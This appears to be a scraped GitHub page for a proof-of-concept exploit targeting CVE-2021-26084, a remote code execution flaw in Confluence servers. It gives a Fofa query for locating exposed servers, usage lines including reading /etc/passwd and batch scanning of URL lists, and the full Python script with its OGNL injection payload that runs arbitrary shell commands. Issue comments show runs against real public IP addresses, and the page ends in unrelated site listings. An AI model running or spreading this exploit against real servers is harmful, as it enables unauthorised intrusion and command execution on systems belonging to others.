CVE-2021-26084 Remote Code Execution on Confluence Servers
CVE-2021-26084 Remote Code Execution on Confluence Servers.
Fofa:
app="ATLASSIAN-Confluence"
Show help information.
python PoC.py
Vulnerability verification for individual websites.
python PoC.py -u https://1.1.1.1
Command execution.
python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'
Batch testing.
python PoC.py -f urls.txt
Hi.
Can update auto shell.
sample:
--shell
https://github.com/r0ckysec/CVE-2021-26084_Confluence
root@ubuntu:/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1//CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e whoami
[+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
root@ubuntu:
[+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
Traceback (most recent call last):
File "PoC.py", line 100, in
exp(args.url, args.exec, path)
File "PoC.py", line 66, in exp
soup = BeautifulSoup(res, "html5lib")
File "/usr/local/lib/python3.6/dist-packages/bs4/init.py", line 251, in init
% ",".join(features))
bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library?
root@ubuntu:/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e "whoami"/CVE-2021-26084#
[+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
Traceback (most recent call last):
File "PoC.py", line 100, in
exp(args.url, args.exec, path)
File "PoC.py", line 66, in exp
soup = BeautifulSoup(res, "html5lib")
File "/usr/local/lib/python3.6/dist-packages/bs4/init.py", line 251, in init
% ",".join(features))
bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library?
root@ubuntu:
今天没检测出来。发现路径不对。
第56行修改method="POST" 为method="post"
附上可用的code:
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File : PoC.py
@Time : 2021/09/01 14:16:26
@Author : _0xf4n9x_
@Version : 1.0
@Contact : [email protected]
"""
import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()
def usage():
print("Eg: \n python3 PoC.py -u http://127.0.0.1")
print(" python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
print(" python3 PoC.py -f urls.txt")
def poc(host):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
try:
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False)
if 'netmask' and 'inet' and 'netmask' in res.text:
print("[+] " + host + " is vulnerable!")
return 1
else:
print("[-] " + host + " is not vulnerable!")
except:
pass
def exp(host, command):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {
"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False).text
print(res)
soup = BeautifulSoup(res, "html5lib")
content = soup.find(method="post").find_all('input')[1]["value"]
print(content.replace('aaaaaaaa[', '').replace('\n]', ''))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
parser.add_argument('-u', '--url', type=str,
help="vulnerability verification for individual websites")
parser.add_argument('-e', '--exec', type=str,
help="command execution")
parser.add_argument('-f', '--file', type=str,
help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
args = parser.parse_args()
if len(sys.argv) == 3:
if sys.argv[1] in ['-u', '--url']:
poc(args.url)
elif sys.argv[1] in ['-f', '--file']:
if os.path.isfile(args.file) == True:
with open(args.file) as target:
hosts = []
hosts = target.read().splitlines()
for host in hosts:
if poc(host) == 1:
with open("success.txt", "a+") as f:
f.write(host + "\n")
elif len(sys.argv) == 5:
if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
if poc(args.url) == 1:
exp(args.url, args.exec)
else:
parser.print_help()
usage()
已证明漏洞存在,但无法利用
bash: -c:行0: 未预期的符号 &' 附近有语法错误 bash: -c:行0: 'whoami''
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.